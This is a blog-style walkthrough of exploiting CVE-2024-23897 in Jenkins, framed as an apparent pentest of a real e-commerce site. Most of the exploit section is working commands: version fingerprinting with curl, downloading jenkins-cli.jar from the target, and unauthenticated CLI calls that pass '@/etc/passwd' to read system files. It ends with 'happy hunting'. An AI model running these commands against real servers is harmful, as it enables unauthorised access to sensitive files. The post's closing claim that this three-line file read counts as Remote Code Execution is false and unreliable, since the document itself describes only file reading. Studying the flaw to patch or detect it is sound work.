RCE Jenkins CVE-2024–23897
Background Story
In today’s cybersecurity analysis, we delve into a demonstration of a proof of concept (POC) exploiting CVE-2024–23897, a critical vulnerability in the latest version of Jenkins. This exploration will cover the methodology to leverage this vulnerability for achieving Remote Code Execution (RCE) on Jenkins. Significantly, the exploit is effective regardless of authentication status, posing a threat in both authenticated and unauthenticated scenarios.
lets see what Jenkins is first:
Jenkins is a tool used primarily for something called “continuous integration” and “continuous delivery” in software development. Here’s a simple way to understand it:
- Jenkins is like a helper for software developers. It’s a program that automates many of the boring or repetitive tasks they have to do when creating software.
Now let’s dive into a real-world case I came across. While conducting penetration testing for an e-commerce website, I stumbled upon something quite unexpected: their Jenkins port was wide open and accessible. How did I find this out?
Well, I ran a RustScan on their domain few days ago, and to my surprise, they weren’t using any proxy servers either. This made the vulnerability glaringly obvious.
after discovering the open port, I accessed the Jenkins dashboard. I found only two users there: one ‘superadmin’ and one ‘anonymous’. Given the risks and potential ethical implications, I decided against attempting to brute-force the ‘superadmin’ account. Instead, I shifted my focus to pen-testing other components of the website, looking for other vulnerabilities or areas of concern that could be addressed to enhance the site’s overall security.
The turn of events became more interesting when a colleague tipped me off about CVE-2024–23897, a newly released vulnerability. It felt like a stroke of luck. With this new information in hand, I immediately returned to the website’s Jenkins dashboard. Eager to see if this exploit could be the key, I began testing it out, curious to discover if it could indeed provide a breakthrough in my penetration testing efforts.
Exploit POC
What the exploit is Actually:
CVE-2024–23897 is a critical vulnerability identified in Jenkins, specifically affecting its command-line interface (CLI). This vulnerability stems from how Jenkins uses the args4j library to parse command arguments. The issue arises due to a feature in the Jenkins CLI command parser that does not properly handle an ‘@’ character followed by a file path in an argument. This flaw allows attackers to exploit the feature to read arbitrary files on the Jenkins controller file system.
The vulnerability affects Jenkins versions up to 2.441 and LTS (Long-Term Support) versions up to 2.426.2.
Usage:
Discovering Jenkins Version
Identifying the Jenkins version is a crucial step in determining the vulnerability status of a Jenkins instance, specifically regarding CVE-2024–23897. This can be achieved using a simple curl command. This command helps ascertain whether the Jenkins version in use is susceptible to this specific vulnerability.
curl -I <http://jenkins.website.com:8080>
The critical piece of information here is the X-Jenkins header, which reveals the version of Jenkins currently running. In my case, the version was 2.426.2.
Downloading and Using the Jenkins CLI
First, we need to download the CLI tool for Jenkins:
wget <http://jenkins.website.com:8080/jnlpJars/jenkins-cli.jar>
In the scenario where you possess authenticated access, the recommended approach is to utilize the following command to check what commands you can use :
java -jar jenkins-cli.jar -s <http://localhost:8080> -auth admin:admin help
but for my scenario, i had unauthenticated access so in that case you can use the following command:
java -jar jenkins-cli.jar -s <http://localhost:8080> shutdown @/etc/passwd
Unauthenticated or missing Global/Read permissions can only read 3 lines:
Read the first line:
java -jar jenkins-cli.jar -s <https://xxx.yyy/jenkins> who-am-i "@/etc/passwd"
Read second line:
java -jar jenkins-cli.jar -s <https://xxx.yyy/jenkins> enable-job "@/etc/passwd"
Read third line:
java -jar jenkins-cli.jar -s <https://xxx.yyy/jenkins> help "@/etc/passwd"
Real-world scenario
In my personal experience with this technique, here’s how I applied it in a real-world scenario. The commands ‘who-am-i’, ‘enable-job’, and ‘help’ were particularly useful. They allowed me to read the first three lines from any existing file on the system. As far as I know, when you’re unauthenticated, your access is limited to just the initial three lines of any file. But guess what? Even with this limitation, you’ve successfully achieved Remote Code Execution (RCE) on the latest version of Jenkins! So, congratulations on this accomplishment.
happy hunting!